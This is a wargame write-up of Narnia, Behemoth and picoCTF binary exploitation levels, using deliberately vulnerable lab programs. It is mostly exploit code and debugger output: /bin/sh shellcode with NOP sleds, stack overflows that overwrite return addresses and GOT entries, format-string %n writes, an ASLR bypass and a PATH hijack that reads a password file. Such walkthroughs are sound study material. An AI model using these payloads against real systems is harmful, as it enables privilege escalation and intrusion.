export EGG=`python -c 'print "\x90"*90 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`

Searching our environment variable we get it at address 0xffffd8d4.

(gdb) x/100xw $esp+500
0xffffd7e4: 0x0000000f  0xffffd80b  0x00000000  0x00000000
0xffffd7f4: 0x00000000  0xde000000  0x1a2a5992  0xf11444ea
0xffffd804: 0x11433cf3  0x694a71a2  0x00363836  0x672f0000
0xffffd814: 0x73656d61  0x72616e2f  0x2f61696e  0x6e72616e
0xffffd824: 0x00386169  0x41414141  0x41414141  0x41414141
0xffffd834: 0x41414141  0x41414141  0xffffd828  0x41414141
0xffffd844: 0x41414141  0x41414141  0x42424242  0x47445800
0xffffd854: 0x5345535f  0x4e4f4953  0x3d44495f  0x35343239
0xffffd864: 0x45485300  0x2f3d4c4c  0x2f6e6962  0x68736162
0xffffd874: 0x52455400  0x74783d4d  0x006d7265  0x5f485353
0xffffd884: 0x45494c43  0x353d544e  0x34392e39  0x2e31362e
0xffffd894: 0x20343731  0x37373835  0x32322032  0x48535300
0xffffd8a4: 0x5954545f  0x65642f3d  0x74702f76  0x31312f73
0xffffd8b4: 0x5f434c00  0x3d4c4c41  0x47450043  0x90903d47
0xffffd8c4: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd8d4: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd8e4: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd8f4: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd904: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd914: 0x90909090  0x90909090  0x99580b6a  0x2f2f6852
0xffffd924: 0x2f686873  0x896e6962  0xcdc931e3  0x53550080
0xffffd934: 0x6e3d5245  0x696e7261  0x4c003861  0x4f435f53
0xffffd944: 0x53524f4c  0x3d73723d  0x69643a30  0x3b31303d

Let’s redirect our program to 0xffffd8d4 to get the shell

(gdb) run `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "A"*12 + "\xd4\xd8\xff\xff"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /games/narnia/narnia8 `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "A"*12 + "\xd4\xd8\xff\xff"'`

Breakpoint 1, 0x080484a7 in func ()
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAA(���AAAAAAAAAAAA����(���
process 19900 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "func" in current context.
Error in re-setting breakpoint 1: No symbol "func" in current context.
Error in re-setting breakpoint 1: No symbol "func" in current context.
$

Trying this without gdb didn’t work because the address of character array changes

narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'`
AAAAAAAAAAAAAAAAAAAA(A��
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'` | hexdump
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 4128 ffff 0a02
000001a

Changing 28 to 0a just by chance gave me the correct address to be pointed at

narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x0a\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'` | hexdump
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 d837 ffff 0a03
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x37\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'`
AAAAAAAAAAAAAAAAAAAA7���BBBBBBBBBBBB����7���
$

For example, below you need the address of secret to write the new value 0x1337beef.

unsigned secret = 0xdeadbeef;

int main(int argc, char **argv){
    unsigned *ptr;
    unsigned value;
    char key[33];
    FILE *f;
    printf("Welcome! I will grant you one arbitrary write!\n");
    printf("Where do you want to write to? ");
    scanf("%p", &ptr);
    printf("Okay! What do you want to write there? ");
    scanf("%p", (void **)&value);
    printf("Writing %p to %p...\n", (void *)value, (void *)ptr);
    *ptr = value;
    printf("Value written!\n");
    if (secret == 0x1337beef){
        printf("Woah! You changed my secret!\n");
        printf("I guess this means you get a flag now...\n");

        f = fopen("flag.txt", "r");
        fgets(key, 32, f);
        fclose(f);
        puts(key);
        exit(0);
    }
    printf("My secret is still safe! Sorry.\n");
}
  • In another challenge below, It can be easily seen the value of secret can be changed after entering 16 characters + 0xc0deface. As, 0xc0deface can’t be printed as ASCII characters, you can use python to pass the input.

python -c ' print "A" * 16 + "\xc0\xde\xfa\xce"' or python -c ' print "A" * 16 + "\xce\xfa\xde\xc0"' based on the endianess of the system.
void give_shell(){
     gid\_t gid = getegid();
     setresgid(gid, gid,gid);
     system("/bin/sh -i"); }

void vuln(char \*input){
     char buf[16];
     int secret = 0;
     strcpy(buf,input);

 if (secret == 0xc0deface){
     give_shell();
 }else{
     printf("The secret is %x\n", secret);
 }

}

int main(int argc, char \*\*argv)
{ if (argc > 1)
     vuln(argv[1]);
     return 0; }
  • Controlling the EIP: In the below challenge, an attacker can use a buffer overflow to take control of the program’s execution. the return address for the call to vuln function is above buf on the stack, so it can be overwritten with an overflow. this allows an attacker to put nearly any address they desire in place of the return address. in this example, the goal is to call the give_shell function.

  • We need to find the address of give_shell function which can be done either by using gdb and print give_shell or objdump -d outputfile | grep give_shell.

  • To know the EIP offset, you can use cyclic patterns. Use pattern_create.rb and pattern_offset.rb So pattern_create.rb 100 for instance will create a 100 byte cyclic pattern.

  • Then you feed this as your input to the vulnerable program and it will crash. so get the value of EIP at that point.

  • Then, we just need to pass the input to the program by

./a.out $(python -c ' print "A" \* Offset + "Address of give\_shell in hex"' )
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* This never gets called! */
void give_shell(){
     gid_t gid = getegid();
     setresgid(gid, gid, gid);
     system("/bin/sh -i");
}

void vuln(char *input){
     char buf[16];
     strcpy(buf, input);
}

int main(int argc, char **argv){
     if (argc > 1)
        vuln(argv[1]);
        return 0;
}
  • Execute Me: If you check the below code, getegid() function shall return the effective group ID of the calling process., setresuid() sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process. If you see, read function read the stdin into the buffer and (function_ptf) buf() function is called which would call anything in the buffer.

  • Since, buf will execute anything, we need a shell code to fit in 128 bytes, There are plenty of shellcode (with different platforms and different working)which can be found on Shell-Storm.

  • Then, we just need to pass the input to the program by

    ./a.out $(python -c ' print "A" \* Offset + "Address of give\_shell in hex"' )
    
    #include <stdio.h>
    #include <stdlib.h>
    
    int token = 0;
    
    typedef void (*function_ptr)();
    
    void be_nice_to_people(){
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
    }
    
    int main(int argc, char **argv){
             char buf[128];
    
             be_nice_to_people();
             read(0, buf, 128);
             ((function_ptr)buf)();
     }
    
  • ROP1: This binary is running on a machine with ASLR! (Address space layout randomization (ASLR) is a computer security technique involved in protection from buffer overflow attacks.) Can you bypass it?

  • From the code provided we can see that there’s a buffer overflow in the vuln() function due to the strcpy() call. run the program within gdb and see what the state of the registers and the stack are at the time of the crash.

  • From the cylic patterns tools, we could find that offset is at 76 which could be confirmed by providing a input of 76 “A”s and 4 “B”s to overwrite EIP. set a breakpoint after the call to strcpy(); that is *vuln+24. After the leave instruction is executed, EIP will be set to 0x424242.

  • EAX points to our buffer of “A”s and since the binary doesn’t have the NX bit, we can execute shellcode on the stack. To bypass ASLR, we just need to find an address that will do a JMP/CALL EAX and set that as our return address. msfelfscan can find a list of instructions to accomplish this:

  • Since the binary is compiled for 32 bit, searching the shellcode in Shellstorm for Linux_x86 executing /bin/sh, we get 21 bytes shellcode in kernelpanic.

  • As EAX contains the 76*A + BBBB when the vuln function returns, we just need to find address which will execute JMP EAX, it can be found by msfelfscan -j eax binary_file

  • One more small but important observation is the number of NOPs, as our shellcode is 21 bytes and offset is 76 bytes and jmp is 4 bytes. So, 76 - 21 - 4 = 51.

import struct
code = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
jmpeax = struct.pack("<I",0x080483e7)
print "\x90"*51 + code + jmpeax
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void be_nice_to_people(){
     gid_t gid = getegid();
     setresgid(gid, gid, gid);
 }

void vuln(char *name){
     char buf[64];
     strcpy(buf, name);
}

int main(int argc, char **argv){
    be_nice_to_people();
    if(argc > 1)
       vuln(argv[1]);
       return 0;
}

Format String Examples

Let’s see a simple example of a format string vulnerabilty.

  • Narnia5

include <stdio.h>
include <stdlib.h>
include <string.h>

int main(int argc, char \*\*argv){
     int i = 1; char buffer[64];
     snprintf(buffer, sizeof buffer, argv[1]);
     buffer[sizeof (buffer) - 1] = 0;
     printf("Change i's value from 1 -> 500. ");

     if(i==500){
       printf("GOOD\n");
       system("/bin/sh");
     }

     printf("No way...let me give you a hint!\n");
     printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
     printf ("i = %d (%p)\n", i, &i);
     return 0;
}

Let’s try to see what’s on stack and if we can put something on stack and change the value of i.

narnia5@melinda:~$ /narnia/narnia5
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x Change i's value from 1 -> 500.
No way...let me give you a hint! buffer :
[f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.62653766.36656436.6666662e.] (63) i
= 1 (0xffffd6cc)

      narnia5@melinda:~$ /narnia/narnia5
      AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x Change i's value from 1 ->
      500. No way...let me give you a hint! buffer :
      [AAAAf7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.41414141.62653766.36656] (63) i
      = 1 (0xffffd6cc)

      narnia5@melinda:~$ /narnia/narnia5
      ``python -c 'print "\xcc\xd6\xff\xff%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"'``
      Change i's value from 1 -> 500. No way...let me give you a hint! buffer
      : [����f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.ffffd6cc.62653766.36656] (63)
      i = 1 (0xffffd6cc)

      narnia5@melinda:~$ /narnia/narnia5
      ``python -c 'print "\xcc\xd6\xff\xff%08x.%08x.%08x.%08x.%08n.%08x.%08x.%08x"'``
      Change i's value from 1 -> 500. No way...let me give you a hint! buffer
      : [����f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8..62653766.36656436.6666] (63)
      i = 40 (0xffffd6cc)

      narnia5@melinda:~$ /narnia/narnia5
      ``python -c 'print "\xcc\xd6\xff\xff%08x.%08x.%08x.%468x.%08n.%08x.%08x.%08x"'``
      Change i's value from 1 -> 500. GOOD $
  • In this example, let’s see use of arbitary writing an address Narnia7

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int goodfunction();
int hackedfunction();

int vuln(const char *format){
        char buffer[128];
        int (*ptrf)();

        memset(buffer, 0, sizeof(buffer));
        printf("goodfunction() = %p\n", goodfunction);
        printf("hackedfunction() = %p\n\n", hackedfunction);

        ptrf = goodfunction;
        printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

        printf("I guess you want to come to the hackedfunction...\n");
        sleep(2);
        ptrf = goodfunction;

        snprintf(buffer, sizeof buffer, format);

        return ptrf();
}

int main(int argc, char **argv){
        if (argc <= 1){
                fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
                exit(-1);
        }
        exit(vuln(argv[1]));
}

int goodfunction(){
        printf("Welcome to the goodfunction, but i said the Hackedfunction..\n");
        fflush(stdout);

        return 0;
}

int hackedfunction(){
        printf("Way to go!!!!");
    fflush(stdout);
        system("/bin/sh");

        return 0;
}

If we see, the program provides us with the address of the ptrf pointer, goodfunction and bad function. The ptrf is assigned the address of goodfunction if we somehow change it to address of the badfunction, we can get a shell. Let’s run the program and see what are the address we get.

./narnia71 A
goodfunction() = 0x804871f
hackedfunction() = 0x8048745

before : ptrf() = 0x804871f (0xffb4450c)
I guess you want to come to the hackedfunction...
Welcome to the goodfunction, but i said the Hackedfunction..

and

narnia7@melinda:/narnia$ ./narnia7 A
goodfunction() = 0x80486e0
hackedfunction() = 0x8048706

before : ptrf() = 0x80486e0 (0xffffd64c)
I guess you want to come to the hackedfunction...
Welcome to the goodfunction, but i said the Hackedfunction..

The reason I have added two running instances is because in the first instance the address is different by one byte 0x1f and 0x45 where as in the second instance the address differs by two bytes 0x86e0 and 0x8706. We can write two bytes by %hn and one byte by %hhn. We can write whole 4 byte address by following a formula

If HOB < LOB

HOB:0x0804
LOB:0x8706

[addr+2][addr] = \x4e\xd6\xff\xff\x4c\xd6\xff\xff
%.[HOB - 8]x   = 0x804 - 8 = 7FC (2044) = %.2044x
%[offset]$hn   = %6\$hn
%.[LOB - HOB]x = 0x8706 - 0x804 = 7F02 (32514) = %.32514x
%[offset+1]$hn = %7\$hn

`python -c 'print "\x4e\xd6\xff\xff\x4c\xd6\xff\xff" +"%.2044x%6\$hn %.32514x%7\$hn"'`

We also need to find the offset where the address is stored which can be done by two methods: Either compiling the program on local machine and checking the buffer just after snprintf

gdb-peda$ p buffer
$2 = "AAAA.000008a2.f7fdeb58.f7fde860.0804835c.0804871f.41414141.3030302e.61383030", '\000' <repeats 51 times>

or by using ltrace

narnia7@melinda:/narnia$ ltrace ./narnia7 `python -c 'print "AAAA" + ".%08x"*7'`
__libc_start_main(0x804868f, 2, 0xffffd764, 0x8048740 <unfinished ...>
memset(0xffffd620, '\0', 128)                                                                                          = 0xffffd620
printf("goodfunction() = %p\n", 0x80486e0goodfunction() = 0x80486e0
)                                                                             = 27

)                                                                         = 30
printf("before : ptrf() = %p (%p)\n", 0x80486e0, 0xffffd61cbefore : ptrf() = 0x80486e0 (0xffffd61c)
)                                                           = 41
puts("I guess you want to come to the "...I guess you want to come to the hackedfunction...
printf("hackedfunction() = %p\n\n", 0x8048706hackedfunction() = 0x8048706
)                                                                            = 50
sleep(2)                                                                                                               = 0
snprintf("AAAA.08048238.ffffd678.f7ffda94."..., 128, "AAAA.%08x.%08x.%08x.%08x.%08x.%0"..., 0x8048238, 0xffffd678, 0xf7ffda94, 0, 0x80486e0, 0x41414141, 0x3038302e) = 67
puts("Welcome to the goodfunction, but"...Welcome to the goodfunction, but i said the Hackedfunction..
)                                                                            = 61
fflush(0xf7fcaac0)                                                                                                     = 0
exit(0 <no return ...>
+++ exited (status 0) +++

If you see 0x41414141 is at offset 6.

gdb-peda$ p ptrf
$3 = (int (*)()) 0x804871f <goodfunction>
gdb-peda$ p &ptrf
$4 = (int (**)()) 0xffffd2ec
gdb-peda$ x /10xb 0xfffd3ea
0xfffd3ea:  Cannot access memory at address 0xfffd3ea
gdb-peda$ x /10xb 0xffffd3ea
0xffffd3ea: 0x3f    0x77    0x00    0x00    0x00    0x00    0x00    0x00
0xffffd3f2: 0x00    0x00
gdb-peda$ x /10xb 0xffffd2ea
0xffffd2ea: 0x04    0x08    0x1f    0x87    0x04    0x08    0x41    0x41
0xffffd2f2: 0x41    0x41
gdb-peda$ p goodfunction
$5 = {int ()} 0x804871f <goodfunction>
gdb-peda$ p ha
hackedfunction  hasmntopt
gdb-peda$ p hackedfunction
$6 = {int ()} 0x8048745 <hackedfunction>
gdb-peda$ p &ptrf
$10 = (int (**)()) 0xffffd2fc
gdb-peda$ run `python -c 'print "\xfc\xd2\xff\xff" + ".%08x"*5 + "%hhn"'`
gdb-peda$ p ptrf
$12 = (int (*)()) 0x8048731 <goodfunction+18>
gdb-peda$ x /10xb 0xffffd2fa
0xffffd2fa: 0x04    0x08    0x31    0x87    0x04    0x08    0xfc    0xd2
0xffffd302: 0xff    0xff
  • Let’s see another example Behemoth3 where we have only the assembly code of the program and we exploit this by two methods by overwriting the GOT address or overwriting the return address.

Assembly Source Code:

(gdb) disassemble main
Dump of assembler code for function main:
   0x0804847d <+0>: push   %ebp
   0x0804847e <+1>: mov    %esp,%ebp
   0x08048480 <+3>: and    $0xfffffff0,%esp
   0x08048483 <+6>: sub    $0xe0,%esp
   0x08048489 <+12>:    movl   $0x8048570,(%esp)
   0x08048490 <+19>:    call   0x8048330 <printf@plt>
   0x08048495 <+24>:    mov    0x80497a4,%eax
   0x0804849a <+29>:    mov    %eax,0x8(%esp)
   0x0804849e <+33>:    movl   $0xc8,0x4(%esp)
   0x080484a6 <+41>:    lea    0x18(%esp),%eax
   0x080484aa <+45>:    mov    %eax,(%esp)
   0x080484ad <+48>:    call   0x8048340 <fgets@plt>
   0x080484b2 <+53>:    movl   $0x8048584,(%esp)
   0x080484b9 <+60>:    call   0x8048330 <printf@plt>
   0x080484be <+65>:    lea    0x18(%esp),%eax
   0x080484c2 <+69>:    mov    %eax,(%esp)
   0x080484c5 <+72>:    call   0x8048330 <printf@plt>
   0x080484ca <+77>:    movl   $0x804858e,(%esp)
   0x080484d1 <+84>:    call   0x8048350 <puts@plt>
   0x080484d6 <+89>:    mov    $0x0,%eax
   0x080484db <+94>:    leave
   0x080484dc <+95>:    ret
End of assembler dump.

Observed Behavior:

behemoth3@melinda:/tmp/rahul3$ ./behemoth3
Identify yourself: HelloCheck123
Welcome, HelloCheck123

aaaand goodbye again.

Well, we tried to provide a very large input to the Identify yourself, but it didn’t not gave a segmentation fault. Let’s try format string:

behemoth3@melinda:/tmp/rahul3$ echo `python -c 'print "A"*4 + ".%08x"*7'` | ./behemoth3
Identify yourself: Welcome, AAAA.000000c8.f7fcac20.00000000.00000000.f7ffd000.41414141.3830252e

aaaand goodbye again.

Trying simple format string provided us with the offset of our format string. Now we can write almost any address with any value with our input. Before that let’s put a environment variable shellcode and check it’s address:

export EGG=`python -c 'print "\x90"*90 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`

Let’s core dump the binary using %s and examine the core. Our shellcode can be reached at 0xffffd8f0

  • Either we can overwrite the return address (main+95): Let’s debug the program set the breakpoint at main+95 and see the value of $esp which would be use to find the return address when binary is executed without gdb. The valueis 0xf7e3ba63 and the return address which needed to be overwrriten is 0xffffd65c. Let’s again core dump the binary to see the return address without gdb.

(gdb) find $esp,+2000,0xf7e3ba63
0xffffd66c
1 pattern found.

So, if we overwrite the return address at 0xffffd66c with our shellcode value of 0xffffd8f0, we should get a shell.

python -c 'print "\x5e\xd6\xff\xff\x5c\xd6\xff\xff" +"%.65527x%6$hn %.55503x%7$hn"' > input98

This is little tricky because we might have to guess the return address without gdb. Previously it was coming 0xffffd66c but we got shell using 0xffffd65c.

  • overwrite the puts GOT address: Find the GOT address of puts which is 0x08049790 and overwrite it with

python -c 'print "\x92\x97\x04\x08\x90\x97\x04\x08" +"%.65527x%6$hn %.55503x%7$hn"'
  • In the below code, if we can somehow set the value of secret to 1337, we can get a shell on the system to read the flag. Also, the printf function directly prints the argument whatever is passed by the user. By concepts above, we need to find the address of secret and write to it. Address of the secret can be found by gdb or objdump. Either the address would be already present on stack or it can be put on stack.

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

int secret = 0;

void give_shell(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

int main(int argc, char **argv){
    int *ptr = &secret;
    printf(argv[1]);

    if (secret == 1337){
        give_shell();
    }
    return 0;
}

Reading the address

pico83515@shell:/home/format$ gdb -q format
Reading symbols from format...(no debugging symbols found)...done.
(gdb) p $secret
$1 = void
(gdb) p &secret
$2 = (<data variable, no debug info> *) 0x804a030 <secret>

Now we have to find whether is this address present on the stack? If not, we can put this address on the stack because of the format string vulnerability.

pico83515@shell:/home/format$ ./format %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
ffffd774.ffffd780.f7e4f39d.f7fc83c4.f7ffd000.0804852b.0804a030.08048520.00000000

We see that the address is present on the stack at the seventh position. Otherwise, we can put it on the stack by

for i in {1..256};do echo -n "Offset: $i:"; env -i ./format AAAA%$i\$x;echo ;done | grep 4141

What this is doing is “Extracting particular stack content by “%$i$x”. As we have seen in DMA, $x can be used to extract particular stack content and reading it. $i value changes from 1-256. However, as you add more data, the offset of your original input changes, so go ahead and add 1333 more bytes of data and see what the offset is then. (1337 is what we want to put into secret, and we will have written four bytes (AAAA), so 1333+4 = 1337)

or i in {1..256};do echo -n "Offset: $i:"; env -i ./format AAAA%$i\$x%1333u;echo ;done | grep 4141
Offset: 103:AAAA41410074
Offset: 104:AAAA31254141

So we found our A’s again, but they aren’t aligned on the stack. Lets add two more A’s at the end to see if we can get it to line up.

for i in {1..256};do echo -n "Offset: $i:"; env -i ./format AAAA%$i\$x%1333uAA;echo ;done | grep 41414141
Offset: 103:AAAA41414141

It looks like the address 0x0804a030 is getting placed in *ptr. That’s the address we need to use in place of our A’s. In order to place the number 1337 into secret’s memory address, we need to use the %n modifier. (%103$n will look at the data located at offset 103 as a memory address, and write the total number of bytes we have written so far into that address.)

pico1139@shell:/home/format$: env -i ./format $:`(python -c 'print "\x30\xa0\x04\x08"+"%1333u%103`\ nAA"')
$ id
uid=11066(pico1139) gid=1008(format) groups=1017(picogroup) $ ls
Makefile flag.txt format format.c $ cat flag.txt
who\_thought\_%n\_was\_a\_good\_idea?

Otherwise as the address at the seventh is already present on stack we can also do

plain pico83515@shell:/home/format$ ./format "%1337u%7$n"

We used DMA to access the memory, so written 1337 directly at the address pointed by the 7th position. Otherwise, we can use the basic

./format %08x.%08x.%08x.%08x.%08x.%1292u%n

If you see, we did 5 stack pop-up by using %08x, written the value to be written at 6th position and 7th position contains the address of secret. If you further see “%08x.” is of eight characters + 1 of “.” or 9 bytes, used five times i.e 9*5=45 bytes and 1292+45 == 1337.

  • In another example below,

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

#define BUFSIZE 256

void greet(int length){
    char buf[BUFSIZE];
    puts("What is your name?");
    read(0, buf, length);
    printf("Hello, %s\n!", buf);
}

void be_nice_to_people(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

int main(int argc, char **argv){
    int length;
    be_nice_to_people();

    puts("How long is your name?");
    scanf("%d", &length);

    if(length < BUFSIZE) //don't allow buffer overflow
        greet(length);
    else
        puts("Length was too long!");
}

This program tries to prevent buffer overflows by first asking for the input length. It disregards the rest of the ouput. However, the program uses scanf. If we supply -1 as the length, we can bypass the overflow check: readelf -l no_overflow can be used to find if there’s any protection on the binary. Stack is executable, Furthermore, ASLR is not enabled. This makes it easy to stick in a shellcode plus a NOP sled and return to an address on the stack

pico1139@shell:/home/no_overflow$ (echo -1; python -c 'print "A"*268+"\xd0\xd6\xff\xff"+"\x90"*200+" "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'; cat) | ./no_overflow
How long is your name?
What is your name?
Hello, AAAAAAAAAAAAAAAAAAAAAA...snip...

id
uid=11066(pico1139) gid=1007(no_overflow) groups=1017(picogroup)
cat flag.txt
what_is_your_sign
  • In an another example where stack is not executable, If you read the code, you would find, we need to change the file_name from not_the_flag.txt to flag.txt. In this example, they provided the address of the string “not_the_flag.txt” as 0x08048777. By putting a break point in puts in gdb and looking for the address of flag.txt.

(gdb) br *puts
Breakpoint 1 at 0x8048460
(gdb) run
Starting program: /home/what_the_flag/what_the_flag

Breakpoint 1, 0xf7e81ee0 in puts () from /lib/i386-linux-gnu/libc.so.6
(gdb) x/s 0x08048777
0x8048777:  "not_the_flag.txt"
(gdb) x/s 0x08048778
0x8048778:  "ot_the_flag.txt"
(gdb) x/s 0x08048770
0x8048770:  "le: %s"
(gdb) x/s 0x0804877C
0x804877c:  "he_flag.txt"
(gdb) x/s 0x0804877D
0x804877d:  "e_flag.txt"
(gdb) x/s 0x0804877E
0x804877e:  "_flag.txt"
(gdb) x/s 0x0804877F
0x804877f:  "flag.txt"
#include <stdlib.h>
#include <stdio.h>

struct message_data{
    char message[128];
    char password[16];
    char *file_name;
};

void read_file(char *buf, char *file_path, size_t len){
    FILE *file;
    if(file= fopen(file_path, "r")){
        fgets(buf, len, file);
        fclose(file);
    }else{
        sprintf(buf, "Cannot read file: %s", file_path);
    }
}

int main(int argc, char **argv){
    struct message_data data;
    data.file_name = "not_the_flag.txt";

    puts("Enter your password too see the message:");
    gets(data.password);

    if(!strcmp(data.password, "1337_P455W0RD")){
        read_file(data.message, data.file_name, sizeof(data.message));
        puts(data.message);
    }else{
        puts("Incorrect password!");
    }

    return 0;
}

So we’ll ovewrite the file pointer with 0x804877f to make it read flag.txt. From gets()’s manual: gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte (‘\0’). No check for buffer overrun is performed (see BUGS below). So by using the following input, we can overwrite the file pointer and still provide the correct password:

1337_P455W0RD
1337_P455W0RD\0aa\x7f\x87\x04\x08
aa\x7f\x87\x04\x08

We use this in the command line to get the flag

pico83515@shell:/home/what_the_flag$ printf "1337_P455W0RD\0bb\x7f\x87\x04\x08" | ./what_the_flag
Enter your password too see the message:
Congratulations! Here is the flag: who_needs_%eip

pico83515@shell:/home/what_the_flag$

Miscellanous Examples

Let’s see some miscellanous examples away from Buffer/Format Vulnerabilities.

  • So, we have a binary which when executed gives

behemoth2@melinda:/behemoth$ ./behemoth2
touch: cannot touch '13373': Permission denied

Let’s see what ltrace provides us

behemoth2@melinda:/behemoth$ ltrace ./behemoth2
__libc_start_main(0x804856d, 1, 0xffffd794, 0x8048640 <unfinished ...>
getpid()                                                                                                               = 14118
sprintf("touch 14118", "touch %d", 14118)                                                                              = 11
__lxstat(3, "14118", 0xffffd688)                                                                                       = -1
unlink("14118")                                                                                                        = -1
system("touch 14118"touch: cannot touch '14118': Permission denied
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                                 = 256
sleep(2000

Let’s see a truncated output of disassemble main, if we see getpid gets the binary pid, sprintf something in some buffer, lstat provides thefile status, unlink -call the unlink function to remove the specified file.

(gdb) disassemble main
Dump of assembler code for function main:
   0x08048588 <+27>:    call   0x8048410 <getpid@plt>
   0x080485b3 <+70>:    call   0x8048450 <sprintf@plt>
   0x080485c7 <+90>:    call   0x80486c0 <lstat>
   0x080485df <+114>:   call   0x8048400 <unlink@plt>
   0x080485eb <+126>:   call   0x8048420 <system@plt>
   0x080485f7 <+138>:   call   0x80483e0 <sleep@plt>
   0x08048616 <+169>:   call   0x8048420 <system@plt>
   0x08048635 <+200>:   leave
   0x08048636 <+201>:   ret

If you check the ltrace output

system("touch 14118"touch: cannot touch '14118': Permission denied

touch is being called without an absolute path, so we can take advantage of that. First we’ll create our own touch script that prints out the contents /etc/behemoth_pass/behemoth3. Next, the PATH variable needs to be updated so that it looks at the current working directory first to ensure that our touch script is executed and not the actual touch program. PATH=/tmp:$PATH, you set /tmp to your primary location to search for binaries and the like… so if you create a file in /tmp/ called touch, it’ll actually execute that instead of /usr/bin/touch

behemoth2@melinda:/tmp/rahul2$ cat touch
cat /etc/behemoth_pass/behemoth3
behemoth2@melinda:/tmp/rahul2$ history | grep PATH
19  history | grep PATH
behemoth2@melinda:/tmp/rahul2$ PATH=/tmp/rahul2:$PATH /behemoth/behemoth2
**********

Changelog